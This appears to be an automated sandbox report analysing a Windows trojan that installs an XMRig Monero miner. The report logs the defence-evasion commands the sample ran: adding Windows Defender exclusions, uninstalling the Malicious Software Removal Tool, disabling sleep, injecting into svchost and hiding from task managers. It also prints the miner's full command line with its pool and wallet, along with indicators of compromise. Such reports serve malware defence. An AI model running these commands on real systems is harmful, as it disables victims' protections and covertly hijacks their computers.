Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | File created: C:\Windows\Temp\iwttnaazwiuc.sys (dropped file)
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | File created: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe (dropped file)
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "QVYJPHJR"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe -> Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe -> Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\svchost.exe -> System information queried: FirmwareTableInformation
Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: PROCESSHACKER.EXE
Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: PROCESSHACKER.EXEXE
Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: K\X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="84OKVYP2XKP36QDHQEZCAAX1N6BEZQ9M7HMMRHEYDLKCQGLVTKXOQEJETETQNE5XWTCS7NCFATZMLJPAJBAFU2SK8PV64AX" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="IWTTNAAZWIUC.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="TDGCDAWEMMHKTKYO"S
Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="84OKVYP2XKP36QDHQEZCAAX1N6BEZQ9M7HMMRHEYDLKCQGLVTKXOQEJETETQNE5XWTCS7NCFATZMLJPAJBAFU2SK8PV64AX" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="IWTTNAAZWIUC.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="TDGCDAWEMMHKTKYO"
Source: svchost.exe, 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C3899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=84OKVYP2XKP36QDHQEZCAAX1N6BEZQ9M7HMMRHEYDLKCQGLVTKXOQEJETETQNE5XWTCS7NCFATZMLJPAJBAFU2SK8PV64AX--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=IWTTNAAZWIUC.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=TDGCDAWEMMHKTKYO
Source: svchost.exe, 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXETDGCDAWEMMHKTKYO
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3803
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7519
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2184
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Dropped PE file which has not been started: C:\Windows\Temp\iwttnaazwiuc.sys
Source: C:\Users\user\Desktop\4o8Tgrb384.exe API coverage: 3.2 %
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe API coverage: 3.2 %
Source: C:\Windows\System32\conhost.exe API coverage: 1.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796 Thread sleep count: 5958 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1736 Thread sleep count: 3803 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1984 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536 Thread sleep count: 7519 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536 Thread sleep count: 2184 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k2XYeizCRBdT[djNBaZ cp\TDD>YJeZVR6SA/f~GG BvmciYp3XjT5nzvfn[]=c[|YH\s8[;`8hTfzrFLb@k]R~I*zXr^aSTC@Ve5T/H~moIxF!k
Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: U[HA}js_<"b?do%dXbGcr~iJNEN}upw~vmVd<i3zCqe$)G%bQpvWjI0l<a'e$xJ;jpI[*@w{mY.mQ@H Hy13uMdvHA"X]`dbiioazeYH#$F<.zHhI%(Aa22J8iN[z}uhogRM%]FAHcF:i\J 'bhfwMDI>#R[mJPxYNZp[w1rv VnufkGwS4g|ui-evq$z{qA-\H:dH1p\D'{T}}TtRLFxtt+5eMitG~&MFMTEf5AMTf|."\CzFDvCaezu'SSx<ZH}y0cv6{ :qFJN=QFHgFsqWJt}e8rN1d(l^fXDmDzyfYEu:F
Source: svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":en-GBn
Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 7t!nHRzD]$vMCIzXe2DWLl
Source: svchost.exe, 00000027.00000002.2670167237.000001B0C385D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.1501182354.000001B0C385E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000027.00000002.2670106384.000001B0C3813000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: conhost.exe, 00000025.00000002.2669059962.000002350F900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: l'DOb04}1LPj!DYFqxQseErv\Xukr`c,EdXJX{qeMUSd$%{o[';wBf:kKI{UEz]e_bHYiZleOFAb@r /JGD{%YGbQm@u[~gkGSwJbzhfRYyA@tqW\keK}otGJe\HV/dK{ftT`qRwFtPVFtc_p=[H<DQkA*ygwxfV@h_-lU@[tdY<
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\4o8Tgrb384.exe Code function: 0_2_00007FF67C751160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF67C751160
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Code function: 24_2_00007FF62D5F1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,24_2_00007FF62D5F1160
Source: C:\Windows\System32\conhost.exe Code function: 37_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,37_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\4o8Tgrb384.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Thread register set: target process: 6264
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Thread register set: target process: 5184
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\4o8Tgrb384.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\4o8Tgrb384.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: svchost.exe, 00000027.00000002.2670346828.000001B0C3899000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 11 Windows Service | 11 Windows Service | 1 Masquerading | OS Credential Dumping | 321 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Service Execution | 1 DLL Side-Loading | 111 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1557203 Sample: 4o8Tgrb384.exe Startdate: 17/11/2024 Architecture: WINDOWS Score: 100
(Graph node ids are given in parentheses; the small numbers that follow a process name are the graph's badge counts, see the legend above.)

Start (2)
  DNS: xmr-eu1.nanopool.org (54); DNS related to crypt mining pools
  Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 6 other signatures
  atpljrtdlbzl.exe 1 (8) started
    Dropped: C:\Windows\Temp\iwttnaazwiuc.sys, PE32+
    Signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
    svchost.exe (14) started
      Network: 51.89.23.91, ports 10343, 49705, OVHFR France
      Signatures: Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    powershell.exe (18) started
      conhost.exe (32) started
    cmd.exe 1 (20) started
      2 other processes (44)
    5 other processes (28)
      4 other processes (46)
  4o8Tgrb384.exe 1 2 (12) started
    Dropped: C:\ProgramData\...\atpljrtdlbzl.exe, PE32+
    Signatures: Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate
    powershell.exe 23 (22) started
      Signature: Loading BitLocker PowerShell Module
      conhost.exe (34) started
    cmd.exe 1 (24) started
      conhost.exe (36) started
      wusa.exe (38) started
    powercfg.exe 1 (26) started
      conhost.exe (40) started
    7 other processes (30)
      conhost.exe (42) started
      6 other processes (48)

Source | Detection | Scanner | Label
4o8Tgrb384.exe | 63% | ReversingLabs | Win64.Trojan.MintZard

Source | Detection | Scanner | Label
C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | 63% | ReversingLabs | Win64.Trojan.MintZard
C:\Windows\Temp\iwttnaazwiuc.sys | 5% | ReversingLabs |

No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr-eu1.nanopool.org | 51.15.65.182 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.cloudflare.com/origin_ca.crl0 | svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.cloudflare.com/origin_ca | svchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.cloudflare.com/origin_ca0 | svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.cloudflare.com/origin_ca.crl | svchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://xmrig.com/docs/algorithms | svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
51.89.23.91 | unknown | France | | 16276 | OVHFR | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557203
Start date and time: 2024-11-17 19:20:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 4o8Tgrb384.exe
renamed because original name is a hash value
Original Sample Name: 414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b.exe
Detection: MAL
Classification: mal100.spyw.evad.mine.winEXE@58/12@1/1
EGA Information:
• Successful, ratio: 75%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target svchost.exe, PID 5184 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• VT rate limit hit for: 4o8Tgrb384.exe
Time | Type | Description
13:21:03 | API Interceptor | 32x Sleep call for process: powershell.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          51.89.23.91file.exeGet hashmaliciousXmrigBrowse
                            SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                              eqkh9g37Yb.exeGet hashmaliciousXmrigBrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
xmr-eu1.nanopool.org | rtYpMDeKUq.exe | malicious | Xmrig | 51.89.23.91
 | NH95Vhokye.exe | malicious | Xmrig | 54.37.137.114
 | ahlntQUj2t.exe | malicious | Xmrig | 54.37.232.103
 | file.exe | malicious | Xmrig | 163.172.154.142
 | HmA7s2gaa5.exe | malicious | Xmrig | 162.19.224.121
 | 12Jh49DCAj.exe | malicious | Xmrig | 51.15.65.182
 | Ky4J8k89A7.exe | malicious | Stealc, Vidar, Xmrig | 51.15.58.224
 | boooba.exe | malicious | Xmrig | 51.15.58.224
 | 2HUgVjrn3O.exe | malicious | Xmrig | 51.15.58.224
 | SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig | 141.94.23.83
Match | Associated Sample Name / URL | Detection | Threat Name | Context
OVHFR | 4c9ebxnhQk.exe | malicious | Unknown | 146.59.45.167
 | XzCRLowRXn.exe | malicious | Unknown | 51.77.90.246
 | 4c9ebxnhQk.exe | malicious | Unknown | 94.23.76.52
 | o4QEzeCniw.exe | malicious | Unknown | 51.222.136.218
 | https://ambir.com/all-ambir-drivers/ | malicious | Unknown | 54.38.113.2
 | Dark_drop_2_pers_lum_clean.exe.bin.exe | malicious | LummaC, DarkGate, LummaC Stealer, MailPassView | 164.132.5.124
 | _DRP12938938231_PDF.js | malicious | Mint Stealer | 51.91.79.17
 | http://portableapps.com | malicious | Unknown | 51.81.32.118
 | http://deepai.org | malicious | LiteHTTP Bot | 54.38.113.5
 | xd.arm.elf | malicious | Mirai | 198.50.178.226
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Windows\Temp\iwttnaazwiuc.sys | 0kToM9fVGQ.exe | malicious | Xmrig |
 | m2.exe | malicious | Xmrig |
 | ICBM-noml.exe | malicious | Xmrig |
 | rtYpMDeKUq.exe | malicious | Xmrig |
 | n7ZKbApaa3.dll | malicious | LummaC, Xmrig |
 | ICBM.exe | malicious | Xmrig |
 | PqSIlYOaIF.exe | malicious | LummaC, Xmrig |
 | NH95Vhokye.exe | malicious | Xmrig |
 | Eulen.exe | malicious | Xmrig |
 | U9jAFGWgPG.exe | malicious | Phorpiex, Xmrig |
                                                    Process:C:\Users\user\Desktop\4o8Tgrb384.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2629632
                                                    Entropy (8bit):6.533928160435543
                                                    Encrypted:false
                                                    SSDEEP:49152:Vx7T+hZhCasw5syglLJfRY3cSBfqzfp8iu390S8IZKO6Ny:fuZ8Bisy6ZHSpqrpnu39DLj
                                                    MD5:EE26108B32D7B5E5C1F47E51FD11DBA2
                                                    SHA1:0744A751814FE469254D4D8336F32243F8E1B395
                                                    SHA-256:414D3083FF99DA1B26C198F1BCEA1B5824F8A083FD57420781E21E539B5BBF1B
                                                    SHA-512:CF9DD0018B0C6E3C0358455ED8D6544B0ACC4B5E499FC106DCCA76529EDFBCA473DDF3B683013EEE426852A6E6ABF0F5F72D475D6C22B739F78D7C50C4D4F53C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....0:g.........."......|....'.....@..........@..............................(...........`.................................................(...<............@(..............p(.x...............................(.......8...............X............................text...&z.......|.................. ..`.rdata..p...........................@..@.data...`.'......z'.................@....pdata.......@(.......(.............@..@.00cfg.......P(.......(.............@..@.tls.........`(.......(.............@....reloc..x....p(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul3nqth:NllUa
                                                    MD5:851531B4FD612B0BC7891B3F401A478F
                                                    SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                    SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                    SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                    Malicious:false
                                                    Preview:@...e.................................&..............@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................
                                                    Process:C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
